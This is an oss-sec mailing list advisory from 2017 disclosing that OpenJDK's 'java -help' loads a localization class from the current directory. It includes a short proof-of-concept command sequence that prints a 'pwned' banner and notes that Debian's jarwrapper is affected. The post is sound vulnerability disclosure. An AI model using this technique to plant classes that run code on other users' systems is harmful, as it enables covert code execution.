oss-sec mailing list archives
OpenJDK: java(1): untrusted search path
From: Jakub Wilk <jwilk () jwilk net>
Date: Tue, 13 Jun 2017 17:23:13 +0200
Running "java -help" can load code from a subdirectory of cwd:
$ javac launcher_en.java
$ mkdir -p sun/launcher/resources/
$ mv launcher_en.class sun/launcher/resources/
$ java -help
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
This happens because:
* By default (i.e. when CLASSPATH env var was unset and neither -cp nor -jar
was specified), java sets "." as the user class path:
https://docs.oracle.com/javase/8/docs/technotes/tools/findingclasses.html#userclass * The help message is apparently supposed to be internationalized. * The Java's localization machinery loads classes: https://docs.oracle.com/javase/8/docs/api/java/util/ResourceBundle.htmlOn Debian systems, jarwrapper (a binfmt-misc thing for running executable jar files) is affected. It contains the following code:
if java -d32 2>&1 | grep "does not support" > /dev/null; then ... On 32-bit systems, this causes java to print the help message. -- Jakub Wilk
Attachment:
launcher_en.java
Description:
Current thread:
- OpenJDK: java(1): untrusted search path Jakub Wilk (Jun 13)
- Re: OpenJDK: java(1): untrusted search path Stiepan (Jun 13)